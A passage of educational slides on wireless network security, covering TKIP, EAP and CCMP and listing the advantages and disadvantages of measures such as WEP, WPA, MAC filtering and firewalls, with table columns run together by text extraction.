– A cryptographic message integrity check to protect packets(michael key)
– An initialization-vector sequencing mechanism that includes hashing, as opposed
to WEP's plain text transmission (IV has sequence numbers)
– A per-packet key-mixing function to increase cryptographic strength (key mixing
with xor function)
– A re-keying mechanism to provide key generation every 10,000 packets.
 EAP
• The Extensible Authentication Protocol (EAP) is a protocol for wireless
networks that expands on authentication methods used by the Point-to-
Point Protocol (PPP), a protocol often used when connecting a computer to
the Internet.
• EAP can support multiple authentication mechanisms, such as token cards,
smart cards, certificates, one-time passwords, and public key encryption
authentication.
• Here's how it works: in communications using EAP, a user requests
connection to a wireless network through an access point (a station that
transmits and receives data, sometimes known as a transceiver).
• The access point requests identification (ID) data from the user and
transmits that data to an authentication server.
• The authentication server asks the access point for proof of the validity of
the ID.
• After the access point obtains that verification from the user and sends it
back to the authentication server, the user is connected to the network as
requested.
 CCMP
• Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol (CCMP) is an encryption protocol
• CCMP offers enhanced security compared with similar technologies
such as Temporal Key Integrity Protocol (TKIP).
• CCMP employs 128-bit keys and a 48-bit initialization vector that
minimizes vulnerability to replay attacks.
• The Counter Mode component provides data privacy.
• The Cipher Block Chaining Message Authentication Code
component provides data integrity and authentication.
• The enhanced privacy and security of CCMP compared with TKIP
requires additional processing power, often necessitating new or
upgraded hardware.
Advantages & Disadvantages of each method
of network security
Method Advantages Disadvantages
No security High speeds Anyone can access the
network
Use a password to access Easy to use Takes some time to enter
your device It will prevent the username and
unauthorized access. password. If it is weak,
then it is easy to crack.
Install an antivirus program Very good protection from May slow down your
on your device malicious software device
Use a software firewall It will monitor and control May slow down your
the traffic flow between device
your computer and the
network and prevent
unauthorized access to
your device
 Advantages & Disadvantages of each
method of network security
Method Advantages Disadvantages
Use a password to access the If a person has access to the Takes some time to enter the
web interface that is used to LAN, uses a web browser and user name and password. If
setup your wireless routers enters the IP address of the it is weak then it is easy to
or access point router, he/she will need a crack.
password to log into the
web-based Utility page of the
modem / router / access
point
Turn On / off Wireless Complete security If the wireless is disabled
connectivity then there is no wireless
network
Enable / disable SSID Invisible to novice users Experienced attackers can
broadcast easily find your SSID
Limit access to wireless Extra security By sniffing the wireless
devices by MAC address transmissions, the allowed
list of MAC addresses can be
easily discovered.
Difficult to manage the list.
 Advantages & Disadvantages of each
method of network security
Method Advantages Disadvantages
WEP wireless security • WEP offers is • WEP encryption uses a
interoperability, since all shared key authentication
wireless devices support and sends the same key
basic WEP encryption. with data packets being
• This can be useful when transmitted across the
trying to use older devices wireless network. If
that need wireless malicious users have
connectivity. (Works with enough time and gather
legacy systems) enough data they can
eventually piece together
their own key.
• If the master key needs to
be changed, it will have to
be manually changed on
all devices connected to
the network. This can be a
tedious task if you have
many devices connected
to your network.
 Advantages & Disadvantages of each
method of network security
Method Advantages Disadvantages
WPA, WPA2 wireless security WPA uses much stronger • incompatibility with legacy
encryption algorithms than hardware and older
its predecessor. WPA uses a operating systems.
Temporary Key Integrity • WPA also has a larger
Protocol (TKIP), which performance overhead
dynamically changes the key and increases data packet
as data packets are sent size leading to longer
across the network. Since the transmission.
key is constantly changing, it
makes cracking the key much
more difficult than that of
WEP. If the need arises to
change the global key, WPA
will automatically advertise
the new key to all devices on
the network without having
to manually change them.
 Advantages & Disadvantages of each
method of network security
Method Advantages Disadvantages
WPS Ease of use New technology
No need to know the SSID Works only with WPS
and security keys or certified devices.
passphrases Some known security issues.
Prevent physical access Limited to the interior of the Very expensive
user’s premises
Use routers’ hardware Prevent hackers and Can’t stop persons in range of
firewall unauthorized persons on the your wifi from getting onto
Internet from getting access your wifi network
to your network
Use encryption software for Extremely difficult for an This process takes some time.
sensitive information sent unauthorized person to read
over the internet your sensitive files
Advantages & Disadvantages of each
method of network security
• userID:
• Advantages:
– Access rights to the network can be set for each
user
– User groups can be created to manage user rights
in batches
• Disadvantages:
– A userID can be stolen
– Does not protect against intercepting messages in
the network
 Advantages & Disadvantages of each
method of network security
• Wi-Fi Protected Access: Advantages of WPA
– Provides extremely strong wireless security
– Adds authentication to WEP’s basic encryption
– Offers backward compatible WEP support for devices that aren’t
upgraded
– Integrates with radius servers to allow administration, auditing, and
logging
• Disadvantages of WPA
– Except when using with the Pre-Shared Key (WPA-PSK), complicated
setup is required, unsuitable for typical home users
– Older firmware usually will not be upgraded to support it
– Incompatible with older operating systems such as Windows 95
– Greater performance overhead than WEP
– Remains vulnerable to Denial of Service attacks 
 Advantages & Disadvantages of each
method of network security
• Firewall
• Advantages
– Relatively inexpensive or free for personal use.
– New releases are becoming user friendly.
– Some firewalls but not all can detect viruses, worms, Trojan horses,
or data collectors.
– A firewall blocks evil packets from being permitted to reach a place
where they can do harm.
• Disadvantages
– Firewalls evolve due to cracker's ability to circumvent the increases.
– Firewalls cannot protect you from internal sabotage within a
network or from allowing other user’s access to your PC.
– Firewalls offer weak defence from viruses.
 Advantages & Disadvantages of each
method of network security
• MAC address
• Advantages
– The advantage to MAC filtering is that there is no attachment cost to
devices that connect to the network.
– The policy is set on a router or switch, and the equipment attached
either is permitted or it is not.
– The person attaching the equipment has nothing to do.

• Disadvantage
– The disadvantage to MAC filtering is that it is easy to spoof.
– Because of the broadcast nature of Ethernet, and particularly wireless
Ethernet, an advisory can sit on the wire and just listen to traffic to and
from permitted MAC addresses.
– Then, the advisory can change his MAC address to a permitted one, and
in most cases obtain access to the network.